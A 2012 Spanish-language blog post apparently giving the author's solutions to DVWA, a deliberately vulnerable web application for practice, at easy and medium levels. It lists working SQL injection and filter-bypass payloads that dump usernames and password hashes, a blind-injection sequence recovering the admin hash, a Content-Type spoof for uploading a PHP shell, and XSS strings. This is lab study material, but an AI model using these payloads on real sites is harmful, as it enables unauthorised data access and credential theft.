domingo, 15 de enero de 2012

DVWA Por MichBukana Level Easy/Medium

Hoy les traigo los resultados de esta herramienta de testeo de vulnerabilidades Tipo Web
y bueno le he dado caña y quería postear aqui las soluciones. si quieren probar les recomiendo
que lo intenten vosotros, las de nivel easy no las pongo por que mmm no tiene ninguna dificultad
para descargar la tool y hacer las pruebas necesitan de un servidor web y luego montar el DVWA


Descarga la aplicación aqui y haz las pruebas:
http://www.dvwa.co.uk/

Brute Force:
//Mi version del Firefox no es compatible con este addon pero bueno ya ven como se bypassea aqui un video:
http://www.youtube.com/watch?v=lmgMXhM01fY


CSRF
level medium
Código:

New password: Confirm new password:

File Include
level medium
Código:
hTTp://127.0.0.1/index.php

-------------------------------------------------
SQL Injection:
level easy
Código:
1' order by 2-- a
1' union select 1,2-- a
1' union select user(),2-- a
1' union select database(),2-- a
1' union select version(),2-- a
1' union select table_name,2 from mysql.tables-- a
1' union select column_name,2 from information_schema.columns where table_name='users'-- a
1' union select concat(User,0x3a,password),2 from users-- a


level medium
Código:
-1/**/union/**/select/**/1,2-- a
-1/**/union/**/select/**/user(),2-- a
-1/**/union/**/select/**/concat(user(),0x3a,database(),0x3a,version()),2-- a
-1/**/union/**/select/**/table_name,2/**/from/**/information_schema.tables-- a
-1/**/union/**/select/**/column_name,2/**/from/**/information_schema.columns/**/where/**/table_name=char(117,115,101,114,115)-- a
-1/**/union/**/select/**/concat(user,0x3a,password),2/**/from/**/users-- a

----------------------------------------------

SQL Injection (Blind)
level medium
Código:
1 or user()=user() and version()=version()
1 || (SELECT Count(*) FROM users)=5
1 || (SELECT Count(user) FROM users)=5
1 || (SELECT LENGTH(password) FROM users WHERE user=char(97,100,109,105,110))=32
1 || (SELECT SUBSTRING((password),1,1) FROM users WHERE user=char(97,100,109,105,110))=5
/* 5 por lo que es integer y no da problema a diferencia con abajo */
1 || (SELECT SUBSTRING((password),1,2) FROM users WHERE user=char(97,100,109,105,110))=char(53,102)
/* Ahora luego como lo siguiente es f quedando asi 5f ya sería integer+varchar y como varchar comprende letas y numeros pues :D */
1 || (SELECT SUBSTRING((password),1,32) FROM users WHERE user=char(97,100,109,105,110))=char(53,102,52,100,99,99,51,98,53,97,97,55,54,53,100,54,49,100,56,51,50,55,100,101,98,56,56,50,99,102,57,57)
/* la pass de admin es 5f4dcc3b5aa765d61d8327deb882cf99 */


Uploader
level medium
Código:
//cambiar el Content-Type de la shell.php por el de la imagen desde httpheader addon firefox modificando las cabezeras enviadas por POST
Content-Type: image/jpeg\r\n\r\n

XSS reflected
level medium
Código:
<body onload=alert(8)>


XSS stored
level medium
Código:
Name:         <input onmouseover="alert(8)" value="
Message:     " />

No hay comentarios:

Publicar un comentario